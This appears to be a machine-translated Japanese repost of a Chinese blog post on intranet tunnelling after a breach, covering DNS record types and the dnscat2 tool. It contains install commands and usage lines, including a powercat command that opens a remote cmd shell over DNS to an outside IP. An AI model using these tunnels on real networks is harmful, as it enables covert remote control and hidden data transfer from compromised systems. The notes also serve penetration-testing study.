イントラネットペネトレーショントンネルプロキシ

シナリオ:イントラネットに入った後、多くのエージェント、ペネトレーション、トンネルツールが必要です。多くの種類と完全なタイプがあります。学習に終わりはありません。要約して記録し、フォローアップで要約を更新し続けます。

1.DNSトンネル

DNS(ドメインネームシステム、ドメインネームシステム)は、ドメイン名とIPアドレス間のマッピングとしてWorld Wide Web上の分散データベースであり、ユーザーはマシンで直接読み取ることができるIP番号を覚えていなくても、より便利にインターネットにアクセスできます。ドメイン名を介して、ドメイン名に対応するIPアドレスを最終的に取得するプロセスは、ドメイン名解決(またはホスト名解決)と呼ばれます。Windowsプラットフォームでは、コマンドラインツールを使用してnslookupと入力します。返される結果には、ドメイン名に対応するIPアドレス(Aレコード)とエイリアス(CNAMEレコード)が含まれます。上記の方法に加えて、外国や国内などの一部のDNSクエリサイトを介してドメイン名のDNS情報をクエリすることもできます。

アドレスこのレコードには、特定のホスト名のIPアドレスが一覧表示されます。これは名前解決の重要な記録です。

CNAME標準名このレコードは、標準ホスト名のエイリアスを指定します。

MX Mail Exchangerこのレコードには、ドメインに送信された電子メールの受信を担当するホストが一覧表示されます。

NSネームサーバーこのレコードは、特定の領域を担当するネームサーバーを指定します。

1、dnscat2

dnscat2ソフトウェアは、DNSプロトコルを使用するエンドツーエンドの送信ツールです。SSHトンネルと同様に、通信の暗号化、認証、複数のセッションをサポートしますが、データの送信はより隠されており、最も一般的なDNSクエリタイプ(TXT、MX、CNAME、A 、AAAA)。dnscat2クライアントはC言語で記述され、サーバーはrubyで記述されています。

サーバーのインストール


$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server/
$ gem install bundler
$ bundle install

Linuxクライアントのインストール


$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/client/
$ make

Windowsクライアントのインストール

自分でコンパイルするか(VS 2008)、リリースからダウンロードする必要があります:https://downloads.skullsecurity.org/dnscat2/

  • 使い方1

実行中のサーバー:ruby dnscat.rb

(ターゲットマシン)実行中のクライアント:./ dnscat --dns server = 103.vps.219、port = 53

接続が確立され、サーバー上にセッションがあります

pingコマンドが正常に実行され、クライアントが応答します

  • 2の使い方(直接接続)

サーバ:

クライアント:

  • 使い方3

サーバー:ruby./dnscat2.rb abc.com --secret = 123456 --security = open --no-cache

クライアント:

Import-Module。\ powercat.ps1

powercat -c 103.45.98.219 -p 53 -dns abc.com -e cmd

動作結果:

ボスの記事を参照してください:

https://mp.weixin.qq.com/s/KH-Y_8Df2COINksR6cbB2w

https://blog.csdn.net/localhost01/article/details/86591685

https://mp.weixin.qq.com/s/7kNISpuqFFVTbmal9z6AJA

https://mp.weixin.qq.com/s/vjmCX6JhdVeURCrhuMK4Aw

https://mp.weixin.qq.com/s/yccot8vJw9yNLOrwUshkLQ

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

おすすめ

転載: blog.csdn.net/qq_32393893/article/details/108937500